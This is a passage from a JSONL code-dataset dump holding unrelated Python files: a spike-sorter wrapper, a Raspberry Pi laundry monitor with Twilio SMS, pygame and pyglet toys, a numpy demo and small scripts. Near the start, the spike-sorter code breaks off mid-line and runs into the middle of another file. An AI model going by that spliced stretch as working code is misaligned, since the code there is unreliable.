Based on the analysis this is in general true\n\n Parameters\n ----------\n s : pd.Series\n series of a particular DataFrame row containing at least these columns\n 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER', 'd_NUM_CHILDREN_LESS_10', 'd_NUM_CHILDREN_GTE_10'\n \"\"\" \n less_10 = (s[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']] < 10).sum()\n gte_10 = s['ANZ_KINDER'] - less_10\n\n s['d_NUM_CHILDREN_LESS_10'] = less_10\n s['d_NUM_CHILDREN_GTE_10'] = gte_10\n \n return s\n ","sub_path":"python/etl/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":17210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"80283950","text":"from pathlib import Path\nimport copy\n\nimport spikeextractors as se\nimport spiketoolkit as st\n\nfrom ..basesorter import BaseSorter\nfrom ..sorter_tools import recover_recording\n\ntry:\n import herdingspikes as hs\n HAVE_HS = True\nexcept ImportError:\n HAVE_HS = False\n\n\nclass HerdingspikesSorter(BaseSorter):\n \"\"\"\n HerdingSpikes is a sorter based on estimated spike location, developed by\n researchers at the University of Edinburgh. It's a fast and scalable choice.\n\n See: HILGEN, Gerrit, et al. Unsupervised spike sorting for large-scale,\n high-density multielectrode arrays. Cell reports, 2017, 18.10: 2521-2532.\n \"\"\"\n\n sorter_name = 'herdingspikes'\n installed = HAVE_HS\n requires_locations = True\n _default_params = None # later\n compatible_with_parallel = {'loky': True, 'multiprocessing': True, 'threading': False}\n\n installation_mesg = \"\"\"\n More information on HerdingSpikes at:\n * https://github.com/mhhennig/hs2\n \"\"\"\n\n def __init__(self, **kargs):\n BaseSorter.__init__(self, **kargs)\n \n @staticmethod\n def get_sorter_version():\n return hs.__version__\n\n def _setup_recording(self, recording, output_folder):\n \n p = self.params\n\n # Bandpass filter\n if p['filter'] and p['freq_min'] is not None and p['freq_max'] is not None:\n recording = st.preprocessing.bandpass_filter(\n recording=recording, freq_min=p['freq_min'], freq_max=p['freq_max'])\n\n if p['pre_scale']:\n recording = st.preprocessing.normalize_by_quantile(\n recording = recording, scale=p['pre_scale_value'],\n median=0.0, q1=0.05, q2=0.95\n )\n\n # this should have its name changed\n self.Probe = hs.probe.RecordingExtractor(\n recording,\n masked_channels=p['probe_masked_channels'],\n inner_radius=p['probe_inner_radius'],\n neighbor_radius=p['probe_neighbor_radius'],\n event_length=p['probe_event_length'],\n peak_jitter=p['probe_peak_jitter'])\n\n def _run(self, recording, output_folder):\n recording = recover_recording(recording)\n p = self.params\n\n if recording.is_filtered and p['filter']:\n print(\"Warning! The recording is already filtered, but Herding Spikes filter is enabled. You can disable \"\n \"filters by setting 'filter' parameter to False\")\n\n self.H = hs.HSDetection(\n self.Probe, file_directory_name=str(output_folder),\n left_cutout_time=p['left_cutout_time'],\n right_cutout_time=p['right_cutout_time'],\n threshold=p['detection_threshold'],\n to_localize=True,\n num_com_centers=p['num_com_centers'],\n maa=p['maa'],\n ahpthr=p['ahpthr'],\n out_file_name=p['out_file_name'],\n decay_filtering=p['decay_filtering'],\n save_all=p['save_all'],\n amp_evaluation_time=p['amp_evaluation_time'],\n spk_evaluation_time=p['spk_evaluation_time']\n )\n\n self.H.DetectFromRaw(load=True, tInc=100000)\n\n sorted_file = str(output_folder / 'HS2_sorted.hdf5')\n if(not self.H.spikes.empty):\n self.C = hs.HSClustering(self.H)\n self.C.ShapePCA(pca_ncomponents=p['pca_ncomponents'],\n pca_whiten=p['pca_whiten'])\n self.C.CombinedClustering(\n alpha=p['clustering_alpha'],\n cluster_subset=p['clustering_subset'],\n bandwidth=p['clustering_bandwidth'],\n bin_seeding=p['clustering_bin_seeding'],\n n_jobs=p['clustering_n_jobs'],\n min_bin_freq=p['clustering_min_bin_freq']\n )\n else:\n self.C = hs.HSClustering(self.H)\n\n if p['filter_duplicates']:\n uids = self.C.spikes.cl.unique()\n for u in uids:\n s = self.C.spikes[self.C.spikes.cl==u].t.diff()= 0x8000):\n return -((65535 - val) + 1)\n else:\n return val\n\n#Ensure that SPI is enabled on RPi\nbus = smbus.SMBus(1)\n\n# This is the address value read via the i2cdetect command\naddress = 0x68\n\n# Wake the Accelerometer MP6050 up as it starts in sleep mode\nbus.write_byte_data(address, power_mgmt_1, 0)\n\n\n\n# Get status of accelerometer\n\ndef get_accel_status(accel_list):\n # Read accelerometer data on the x-axis every second\n accel_xout = read_word_2c(0x3b) \n \n # Append new reading to the accelerometer list containing 5 values\n accel_list.append(accel_xout) \n \n # Delete the first value in the accelerometer list\n # This procedure updates the list every second \n del accel_list[0] \n \n # To check list of output values of accelerometer\n print(\"Accel List: \", accel_list)\n \n # Calculate the standard deviation\n std_dev=stdev(accel_list)\n \n # To check standard deviation of the values in the list\n print(\"Standard Deviation: \", std_dev)\n \n # Determine whether the washer is vibrating or not according to the\n # standard deviation of the list.\n # This value must be calibrated according to the surface and amount of \n # vibrating the accelerometer is subjected to.\n # Read documentation for calibration procedures.\n if std_dev<800:\n print(\"Not Vibrating\")\n vibrate = False\n else:\n print(\"Vibrating\")\n vibrate = True\n return vibrate\n\n\n\n# Get status of door\n \ndef get_door_status():\n # Door closed\n if GPIO.input(21) == GPIO.LOW: \n print(\"Closed\")\n door = True \n \n # Door opened\n if GPIO.input(21) == GPIO.HIGH: \n print(\"Opened\")\n door = False\n return door\n\n\n\n# State Machine\nclass Washing_Machine(sm.SM):\n \n # Initialising\n \n def __init__(self):\n self.start_state = 0\n self.details = ''\n self.name = ''\n self.scanned = False\n self.client = Client(account_sid, auth_token) \n # Create an object of the class MFRC522\n self.MIFAREReader = mfrc522.MFRC522()\n\n\n\n # Updating states according to input\n \n def get_next_values(self, state, inp):\n \n # State 0 and RFID card has not been scanned \n if state == 0 and not self.scanned:\n # Scan for RFID cards\n self.rfid_scanning()\n output = \"Available\"\n \n # Dictionary of door, accelerometer and RFID status\n to_check = {'door': inp[0], 'vibrate' : inp[1], 'scanned' : self.scanned}\n \n # State 0\n if state == 0:\n # Check that door closed, machine is vibrating and RFID card\n # has been scanned.\n if all(to_check.values()):\n next_state = 1\n output = \"Not Available\" \n else: \n next_state = 0\n output = \"Available\"\n \n # State 1\n elif state == 1: \n # Check if washer is still vibrating \n if to_check['vibrate']: \n next_state = 1\n output = \"Not Available\"\n else: \n next_state = 2 \n output = \"Not Available\"\n # Send SMS\n self.rfid_sms()\n \n # State 2\n else: \n # Check if door is still closed\n if to_check['door']: \n next_state = 2\n output = \"Not Available\" \n else: \n # Return to initial state \n next_state = 0 \n output = \"Available\"\n self.scanned = False\n \n assert(next_state in (0,1,2))\n return next_state, output\n\n\n\n # Check for any RFID cards scanned\n \n def rfid_scanning(self): \n # Welcome message\n print(\"Looking for cards\")\n print(\"Press Ctrl-C to stop.\")\n \n # Scan for cards\n (status,TagType) = self.MIFAREReader.MFRC522_Request(self.MIFAREReader.PICC_REQIDL)\n \n # Get the UID of the card\n (status,uid) = self.MIFAREReader.MFRC522_Anticoll()\n \n # If we have the UID, continue\n if status == self.MIFAREReader.MI_OK:\n\n # Print UID\n print(\"UID: \"+str(uid[0])+\",\"+str(uid[1])+\",\"+str(uid[2])+\",\"+str(uid[3]))\n user_uid = str(uid[0])+\",\"+str(uid[1])+\",\"+str(uid[2])+\",\"+str(uid[3])\n time.sleep(2)\n \n # Check that user is in the student database\n try:\n # Retrieve user name\n self.name = user_dict[user_uid]['Name']\n print(\"Name: \", self.name)\n \n # Retrieve user phone number\n self.details = user_dict[user_uid]['HP']\n print(\"Phone Number:\", self.details)\n \n # Update RFID status\n self.scanned = True\n \n except:\n print(\"No such user found\") \n\n\n \n # Send SMS to user\n \n def rfid_sms(self):\n message = self.client.messages.create(\n to=self.details,\n from_=sender_number,\n body= \"Hi \" + self.name + \", your laundry is ready!\")\n print(message)\n\n\n\n# Main Code\ndef main():\n #GPIO Settings\n # Use the BCM GPIO numbers as the numbering scheme.\n GPIO.setmode(GPIO.BCM)\n\n # Set GPIO 21 as input with pull-down resistor.\n GPIO.setup(21, GPIO.IN, GPIO.PUD_DOWN)\n \n # Create an object of the class Washing_Machine\n wm=Washing_Machine()\n wm.start()\n \n # Initial accelerometer list which should be changed during calibration.\n # Read documentation for calibration procedures.\n accel_list=[-1828, -1936, -1944, -1904, -1912]\n \n while True:\n # Retrieve boolean status of door\n door=get_door_status()\n \n # Retrieve boolean status of accelerometer\n vibrate=get_accel_status(accel_list)\n \n # Input both door and accelerometer status into state machine\n inp=(door, vibrate)\n wm.step(inp)\n \n # Update availability on firebase based on output of state machine\n availability_db.child(\"Washer 2\").set(wm.step(inp))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Washer_2.py","file_name":"Washer_2.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"12697551","text":"\n'''\n\n\tProject:\tCS100\n\tTitle:\t\tScenePrimitives\n\n\tAuthor:\t\tJohn Mooney\n\tDate:\t\t1/23/2013\n\n\tDescription:\n\t\tEntry point for running a debug CS100 version\n'''\n\n# Imports\nimport pyglet\nimport sys\nimport os\n\nfrom pyglet.graphics import GL_LINES\n\n\n'''\t\tSet Search Directory\t'''\nfor root, direcs, files in os.walk(os.getcwd()):\n\tfor direc in direcs:\n\t\tsys.path.append(os.path.join(root, direc))\n\n\n# Imports\nimport Color\n\nfrom Renderer import Renderer\nfrom TransformationGraph import Transform\nfrom ResourceManager import ResourceManager\n\nfrom Animation import Animation\nfrom Sprite import Sprite\n\n#-------------------------------------------------------#\t\n\nwindow \t\t\t= pyglet.window.Window(800, 600)\nwinDimensions \t= [800, 600]\n\nrendMan = Renderer(winSize=winDimensions)\nRenderer.activeRenderer = rendMan\n\nsg = rendMan.getSceneGraph()\n\nrm = ResourceManager(\"Tests\\\\data\")\nResourceManager.activeManager = rm\nrm.registerExtension(\".jpg\", \"img\", [\"img\"], pyglet.image.load)\nrm.registerExtension(\".bmp\", \"img\", [\"img\"], pyglet.image.load)\nrm.registerExtension(\".png\", \"img\", [\"img\"], pyglet.image.load)\nrm.registerExtension(\".anim\", \"anim\", [\"anim\"], Animation)\n\nim = rm.request(\"C:/Users/John/Pictures/Lake.jpg\")\n\nsp = pyglet.sprite.Sprite(im)\nsp2 = Sprite(im, t=sg.newTransform())\n\npyglet.gl.glClearColor(1,0,1,0);\ndef update(dt):\n\tpass\n\t\n\t\n@window.event\ndef on_draw():\n\twindow.clear()\n\trendMan.render()\n\tsp.draw()\n\npyglet.clock.schedule(update)\npyglet.app.run()\n\n","sub_path":"py ref/pyglet/CS100-master/Tests/SpriteTest.py","file_name":"SpriteTest.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321355737","text":"#!/usr/bin/env python\n#coding:utf-8\nimport sys,re,os,argparse,fileinput\n\nparser = argparse.ArgumentParser(description=\"This Script is used to find all deg.pro-pro.txt, Co-Expression.xls, filter.coexpression.txt, and filter.propro.txt under a given path, and add the symbol from anno file. New file will replace the old file, old file will be renamed with '.no.symbol.txt' extension.\")\nparser.add_argument(\"-path\",\"--path\",type=str,help=\"The input path, 'deg.pro-pro.txt','Co-Expression.xls','filter.coexpression.txt','filter.propro.txt' file will be found under this path.\",required = True)\nparser.add_argument(\"-anno\",\"--anno\",type=str,help=\"The input anno file, first column must be id, seventh column must be symbol information.\",required = True)\nparser.add_argument(\"-v\",\"--version\",action=\"version\",version='%(prog)s 1.0')\nargs = parser.parse_args()\n\nfile_list = os.popen('find ' + args.path + \" -name deg.pro-pro.txt -o -name Co-Expression.xls -o -name filter.coexpression.txt -o -name filter.propro.txt\").read().rstrip(\"\\n\").split(\"\\n\")\nanno_d = {}\nwith open(args.anno,\"r\") as anno:\n for i in anno:\n anno_d[i.split(\"\\t\")[0]] = i.split(\"\\t\")[6]\n# anno_d[\"-\"] = \"-\"\nfor i in fileinput.input(file_list,backup = \".no.symbol.txt\",inplace = 1):\n t = re.sub('\\(-\\)?',\"(-:-)\",i)\n ensembol = re.findall('\\S+\\((.+?)\\)\\s+?',t)\n if ensembol:\n for ei in ensembol:\n if ei == \"-:-\":\n continue\n else:\n eii = ei.split(\",\")\n for index,eiii in enumerate(eii):\n eii[index] = eiii + \":\" + anno_d[eiii]\n an = \";\".join(eii)\n t = re.sub(ei,an,t,1)\n sys.stdout.write(t)\n else:\n a = i.split(\"\\t\")\n for n,ai in enumerate(a):\n if anno_d.has_key(ai):\n a[n] = ai + \"(\" + anno_d[ai] + \")\"\n sys.stdout.write(\"\\t\".join(a))\n\n \n","sub_path":"add_coex_and_pro_symbol.py","file_name":"add_coex_and_pro_symbol.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"622923781","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 2019-03-12 Guolikai\n# 功能: 使用科学计算库NumPy简化程序\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\n# 解决中文显示问题\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\ndef demo():\n # 生成1-99数组\n arr_1 = np.arange(1,100)\n print(arr_1)\n # s生成随机数是2-12的20列10行矩阵\n arr = np.random.randint(2,13,(10,20))\n print(arr)\n\n # 改变数组形状\n arr1 = np.reshape(arr,(8,25))\n print(arr1)\n\n\ndef main():\n \"\"\"\n 直方图绘制: plt.hist(data,bins) data,数据列表;bins:分组边界\n edgecolor: 边界颜色\n linewidth: 边界线宽度\n rwidth: 直方图宽度\n density: 概率统计(老版本normed)\n \"\"\"\n total_num = 10000\n arr_a = np.random.randint(1, 7, total_num)\n arr_b = np.random.randint(1, 7, total_num)\n # numpy数据运算,即向量化运算\n arr = arr_a + arr_b\n # print('第一个数组:{}'.format(arr_a))\n # print('第二个数组:{}'.format(arr_b))\n # print('二个数组和:{}'.format(arr))\n # print('二个数组相乘:{}'.format(arr_a * arr_b))\n\n # 直接生产直方图的统计具体数据\n hist, bins = np.histogram(arr,bins=range(2, 14))\n print(hist)\n print(bins)\n # 数据可视化\n # X轴加单位,设置x轴坐标点显示\n tick_labels = ['2点', '3点', '4点', '5点', '6点', '7点', '8点', '9点', '10点', '11点', '12点']\n tick_pos = np.arange(2, 13) + 0.5 #生成位置并修改\n plt.xticks(tick_pos, tick_labels)\n plt.title('骰子点数统计')\n plt.xlabel('点数')\n plt.ylabel('统计数量')\n plt.hist(arr, bins=range(2, 14), density=0, edgecolor='black', linewidth=1, rwidth=0.8)\n plt.show()\n\n\nif __name__ == '__main__':\n demo()\n # main()\n","sub_path":"demo_numpy.py","file_name":"demo_numpy.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"149668012","text":"import os\nimport random\nimport pygame\nimport sys\npygame.init()\npygame.font.init()\n\nFPS = 50\nWIDTH = 500\nHEIGHT = 500\nSTEP = 10\nTILE_WIDTH = TILE_HEIGHT = 50\nGRAVITY = 10\n\n\n\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n\nall_sprites = pygame.sprite.Group()\ntiles_group = pygame.sprite.Group()\nplayer_group = pygame.sprite.Group()\nbox_group = pygame.sprite.Group()\nmoney_group = pygame.sprite.Group()\nbox_black_group = pygame.sprite.Group()\nnps_group = pygame.sprite.Group()\nstar_group = pygame.sprite.Group()\nscreen_rect = (0, 0, WIDTH, HEIGHT)\n\n\n\ndef load_image(name, colorkey=None):\n fullname = os.path.join('data', name)\n try:\n image = pygame.image.load(fullname)\n except pygame.error as message:\n print('Cannot load image:', name)\n raise SystemExit(message)\n\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n return image\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\ndef start_screen():\n intro_text = [\"ЗАСТАВКА\", \"\",\n \"Правила игры\",\n \"Если в правилах несколько строк,\",\n \"приходится выводить их построчно\"]\n fon = pygame.transform.scale(load_image('fon.jpg'), (WIDTH, HEIGHT))\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(\"freesansbold.ttf\", 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('black'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return # начинаем игру\n pygame.display.flip()\n clock.tick(FPS)\n\n\na = [['' for i in range(100)] for j in range(100)]\n\nprint(a)\nfor i in range(100):\n for j in range(100):\n chance = random.randint(0, 100)\n if chance < 20:\n a[i][j] = '#'\n else:\n a[i][j] = '.'\n\nfor i in range(100):\n a[0][i] = '$'\n a[99][i] = '$'\n a[i][0] = '$'\n a[i][99] = '$'\n\ni = 0\nwhile i < 50:\n chance2 = random.randint(0, 100)\n if chance2 < 50:\n x, y = random.randint(2, 97), random.randint(2, 97)\n while a[x][y] == '#' and a[x][y] != '@' and a[x][y] != '$' and a[x][y] != '?':\n x, y = random.randint(2, 97), random.randint(2, 97)\n a[x][y] = '*'\n i += 1\n\n\n\nprint(a)\nx, y = random.randint(0, 100), random.randint(0, 100)\nwhile a[x][y] == '#':\n x, y = random.randint(0, 100), random.randint(0, 100)\na[x][y] = '@'\ncash_m = []\n\ndef generate_level(level):\n new_player = None\n for y in range(len(level)):\n for x in range(len(level[y])):\n if level[y][x] == '.':\n Tile('empty', x, y)\n elif level[y][x] == '#':\n Tile('wall', x, y)\n elif level[y][x] == '@':\n Tile('empty', x, y)\n new_player = Player(x, y)\n Tile('npc', x + 1, y + 1)\n elif level[y][x] == '*':\n Tile('empty', x, y)\n cash_m.append(Tile('cash', x, y))\n elif level[y][x] == '$':\n Tile('box_black', x, y)\n elif level[y][x] == '?':\n Tile('empty', x, y)\n Tile('npc', x, y)\n\n\n return new_player\n\ndef cvest_nps():\n chotchik = 0\n proverochra_na_petyxa = False\n\n if pygame.sprite.spritecollideany(player, nps_group):\n intro_text = [\"КВЕСТ ПОЛУЧЕН\", \"------\",\n \"СОБЕРИТЕ 50 МОНЕТ И ВАМ\",\n \"ОТКРОЕТСЯ ТАЙНА МИРОЗДАНИЯ\"]\n if pygame.sprite.spritecollideany(player, money_group) != None:\n chotchik += 1\n if chotchik == 50:\n proverochra_na_petyxa = True\n\n\n font = pygame.font.Font(None, 100)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('black'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n\n\n\ntile_images = {\n 'wall': load_image('box.png'),\n 'empty': load_image('grass.png'),\n 'player': load_image('mario.png'),\n 'cash': load_image('money.png'),\n 'box_black': load_image('box_black.png'),\n 'npc': load_image('npc.png'),\n 'star': load_image('star.png')\n}\n\nclass Tile(pygame.sprite.Sprite):\n def __init__(self, tile_type, pos_x, pos_y):\n if tile_type == 'wall':\n super().__init__(tiles_group, box_group, all_sprites)\n elif tile_type == 'cash':\n super().__init__(money_group, all_sprites)\n elif tile_type == 'box_black':\n super().__init__(box_black_group, all_sprites, tiles_group)\n elif tile_type == 'npc':\n super().__init__(nps_group, all_sprites)\n elif tile_type == 'star':\n super().__init__(star_group, all_sprites)\n else:\n super().__init__(tiles_group, all_sprites)\n self.image = tile_images[tile_type]\n self.rect = self.image.get_rect().move(TILE_WIDTH * pos_x,\n TILE_HEIGHT * pos_y)\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__(player_group, all_sprites)\n self.image = tile_images['player']\n self.rect = self.image.get_rect().move(TILE_WIDTH * pos_x + 15,\n TILE_HEIGHT * pos_y + 5)\n\nclass Camera:\n def __init__(self):\n self.dx = 0\n self.dy = 0\n\n def apply(self, obj): # перемещение любого спрайта\n obj.rect.x += self.dx\n obj.rect.y += self.dy\n\n def update(self, target): # следит за персонажем\n self.dx = -(target.rect.x + target.rect.w // 2 - WIDTH // 2)\n self.dy = -(target.rect.y + target.rect.h // 2 - HEIGHT // 2)\n\n\nstart_screen()\n\nplayer = generate_level(a)\ncamera = Camera()\n\npressed_left = pressed_right = pressed_up = pressed_down = False\nrunning = True\nscreen1 = pygame.transform.scale(load_image('grass.png'), (WIDTH, HEIGHT))\nscreen.blit(screen1, (0, 0))\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN: # check for key presses\n if event.key == pygame.K_LEFT: # left arrow turns left\n pressed_left = True\n elif event.key == pygame.K_RIGHT: # right arrow turns right\n pressed_right = True\n elif event.key == pygame.K_UP: # up arrow goes up\n pressed_up = True\n elif event.key == pygame.K_DOWN: # down arrow goes down\n pressed_down = True\n elif event.type == pygame.KEYUP: # check for key releases\n if event.key == pygame.K_LEFT: # left arrow turns left\n pressed_left = False\n elif event.key == pygame.K_RIGHT: # right arrow turns right\n pressed_right = False\n elif event.key == pygame.K_UP: # up arrow goes up\n pressed_up = False\n elif event.key == pygame.K_DOWN: # down arrow goes down\n pressed_down = False\n print(money_group.sprites())\n # In your game loop, check for key states:\n for i in range(len(cash_m)):\n f = random.randint(1, 150)\n d1, d2 = 0, 0\n if 1 < f < 25 and pygame.sprite.spritecollideany(cash_m[i], box_black_group) == None:\n cash_m[i].rect.x += 15\n d1 = 15\n if 26 < f < 50 and pygame.sprite.spritecollideany(cash_m[i], box_black_group) == None:\n cash_m[i].rect.x -= 15\n d1 = -15\n if 51 < f < 75 and pygame.sprite.spritecollideany(cash_m[i], box_black_group) == None:\n cash_m[i].rect.y += 15\n d2 = 15\n if 76 < f < 100 and pygame.sprite.spritecollideany(cash_m[i], box_black_group) == None:\n cash_m[i].rect.y -= 15\n d2 = -15\n if pygame.sprite.spritecollideany(cash_m[i], box_black_group) != None:\n if d1 == 0:\n cash_m[i].rect.y += d2 * -1\n else:\n cash_m[i].rect.x += d1 * -1\n if pressed_left:\n player.rect.x -= STEP\n if pygame.sprite.spritecollideany(player, box_group) != None or \\\n pygame.sprite.spritecollideany(player, box_black_group) != None:\n player.rect.x += STEP\n elif pygame.sprite.spritecollideany(player, money_group) != None:\n pygame.sprite.spritecollideany(player, money_group).kill()\n if pressed_right:\n player.rect.x += STEP\n if pygame.sprite.spritecollideany(player, box_group) != None or \\\n pygame.sprite.spritecollideany(player, box_black_group) != None:\n player.rect.x -= STEP\n elif pygame.sprite.spritecollideany(player, money_group) != None:\n pygame.sprite.spritecollideany(player, money_group).kill()\n if pressed_up:\n player.rect.y -= STEP\n if pygame.sprite.spritecollideany(player, box_group) != None or \\\n pygame.sprite.spritecollideany(player, box_black_group) != None:\n player.rect.y += STEP\n elif pygame.sprite.spritecollideany(player, money_group) != None:\n pygame.sprite.spritecollideany(player, money_group).kill()\n if pressed_down:\n player.rect.y += STEP\n if pygame.sprite.spritecollideany(player, box_group) != None or \\\n pygame.sprite.spritecollideany(player, box_black_group) != None:\n player.rect.y -= STEP\n elif pygame.sprite.spritecollideany(player, money_group) != None:\n pygame.sprite.spritecollideany(player, money_group).kill()\n\n camera.update(player)\n for sprite in all_sprites:\n camera.apply(sprite)\n\n\n tiles_group.draw(screen)\n player_group.draw(screen)\n money_group.draw(screen)\n box_black_group.draw(screen)\n nps_group.draw(screen)\n star_group.draw(screen)\n cvest_nps()\n pygame.display.flip()\n clock.tick(FPS)\nterminate()\n","sub_path":"1321.py","file_name":"1321.py","file_ext":"py","file_size_in_byte":10667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"487149824","text":"#!/usr/bin/env python3\n\ndef f(n):\n try:\n x = 4 / n\n print('x =', x)\n except ZeroDivisionError as e:\n print('in except block,', e)\n else:\n print('in else block')\n finally:\n print('in finally block')\n\nf(2)\n\nprint()\n\nf(0)\n","sub_path":"22_try_catch.py","file_name":"22_try_catch.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162602588","text":"\"\"\"\n\nDIFFICULTY: SIMPLE\n\nStephen's speech module is broken. This module is responsible for his number pronunciation. He has to click to input all of the numerical digits in a figure, so when there are big numbers it can take him a long time. Help the robot to speak properly and increase his number processing speed by writing a new speech module for him. All the words in the string must be separated by exactly one space character. Be careful with spaces -- it's hard to see if you place two spaces instead one.\nInput: A number as an integer.\nOutput: The string representation of the number as a string.\nHow it is used: This concept may be useful for the speech synthesis software or automatic reports systems. This system can also be used when writing a chatbot by assigning words or phrases numerical values and having a system retrieve responses based on those values.\nPrecondition: 0 < number < 1000\n\"\"\"\n\nFIRST_TEN = {\n \"1\": \"one\",\n \"2\": \"two\",\n \"3\": \"three\",\n \"4\": \"four\",\n \"5\": \"five\",\n \"6\": \"six\",\n \"7\": \"seven\",\n \"8\": \"eight\",\n \"9\": \"nine\"\n }\nSECOND_TEN = {\n \"10\": \"ten\",\n \"11\": \"eleven\",\n \"12\": \"twelve\",\n \"13\": \"thirteen\",\n \"14\": \"fourteen\",\n \"15\": \"fifteen\",\n \"16\": \"sixteen\",\n \"17\": \"seventeen\",\n \"18\": \"eighteen\",\n \"19\": \"nineteen\"\n }\nOTHER_TENS = {\n \"20\": \"twenty\",\n \"30\": \"thirty\",\n \"40\": \"forty\",\n \"50\": \"fifty\",\n \"60\": \"sixty\",\n \"70\": \"seventy\",\n \"80\": \"eighty\",\n \"90\": \"ninety\"\n }\nHUNDRED = \"hundred\"\n\ndef checkio(number):\n STR_NUM = str(number)\n LENGTH = len(STR_NUM)\n huns_dig = 0\n tens_dig = 0\n ones_dig = 0\n two_dig = 0\n final_str = \"\"\n \n if LENGTH == 1:\n final_str = FIRST_TEN[STR_NUM]\n \n if LENGTH == 2:\n if STR_NUM in SECOND_TEN:\n return SECOND_TEN[STR_NUM]\n else:\n tens_dig = number // 10 * 10\n ones_dig = number % 10\n final_str = OTHER_TENS[str(tens_dig)]\n if ones_dig != 0:\n final_str = final_str + \" \" + FIRST_TEN[str(ones_dig)]\n \n if LENGTH == 3:\n \n huns_dig = number // 100\n two_dig = number % 100\n tens_dig = number % 100 // 10 * 10\n ones_dig = number % 10\n \n final_str = FIRST_TEN[str(huns_dig)] + \" \" + HUNDRED\n \n if str(two_dig) in SECOND_TEN:\n final_str = final_str + \" \" + SECOND_TEN[str(two_dig)]\n \n if tens_dig != 0 and str(two_dig) not in SECOND_TEN:\n final_str = final_str + \" \" + OTHER_TENS[str(tens_dig)]\n \n if ones_dig != 0 and str(two_dig) not in SECOND_TEN:\n final_str = final_str + \" \" + FIRST_TEN[str(ones_dig)]\n return final_str\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(4) == 'four', \"1st example\"\n assert checkio(133) == 'one hundred thirty three', \"2nd example\"\n assert checkio(12) == 'twelve', \"3rd example\"\n assert checkio(101) == 'one hundred one', \"4th example\"\n assert checkio(212) == 'two hundred twelve', \"5th example\"\n assert checkio(40) == 'forty', \"6th example\"\n assert not checkio(212).endswith(' '), \"Don't forget strip whitespaces at the end of string\"\n","sub_path":"home/speech_module.py","file_name":"speech_module.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"596001711","text":"# from pathlib import Path\n#\n# p = Path('/tmp/test20200630.csv')\n# parent = p.parent\n# if not parent.exists():\n# parent.mkdir(parents=True)\n#\n# csv_body = '''\\\n# id,name,age,comment\n# 1,zs,18,\"I'm 18\"\n# 2,ls,20,\"this is a \"\"test\"\"string.\"\n# 3,ww,23,\"你好\n#\n# 计算机\n# \"\n# '''\n# p.write_text(csv_body)\n#\n# import csv\n#\n# p = Path('/tmp/test20200630.csv')\n# with open(str(p)) as f:\n# reader = csv.reader(f)\n# print(next(reader))\n# print(next(reader))\n#\n# rows = [\n# \t[4,'tom',22,'tom'],\n# \t(5,'jerry',24,'jerry'),\n# \t(6,'justin',22,'just\\t\"in'),\n# \t\"abcdefghi\",\n# \t((1,),(2,))\n# ]\n#\n# row = rows[0]\n# with open(str(p), 'a') as f:\n# writer = csv.writer(f)\n# writer.writerow(row)\n# writer.writerows(rows)\n# ===================================================\n# 处理ini文件\nfrom configparser import ConfigParser\n\nfilename = '/tmp/test.ini'\nnewfilename = '/tmp/mysql.ini'\n\ncfg = ConfigParser()\ncfg.read(filename)\n# print(cfg.sections())\n# print(cfg.has_section('client'))\n#\n# print(cfg.items('mysqld'))\n# for k,v in cfg.items():\n # print(k, type(v))\n # print(k, cfg.items(k))\n#\n# tmp = cfg.get('mysqld','port')\n# print(type(tmp), tmp)\n# print(cfg.get('mysqld', 'a'))\n# print(cfg.get('mysqld', 'magedu', fallback='python'))\n#\n# tmp = cfg.getint('mysqld', 'port')\n# print(type(tmp), tmp)\n#\nif cfg.has_section('test'):\n cfg.remove_section('test')\n\ncfg.add_section('test')\ncfg.set('test', 'test1', '1')\ncfg.set('test', 'test2', '2')\n\nwith open(newfilename, 'w') as f:\n cfg.write(f)\n\n# print(cfg.getint('test', 'test2'))\ncfg.remove_option('test', 'test2')\n\ncfg['test']['x'] = '100'\ncfg['test2'] = {'test2':'1000'}\n\n# print('x' in 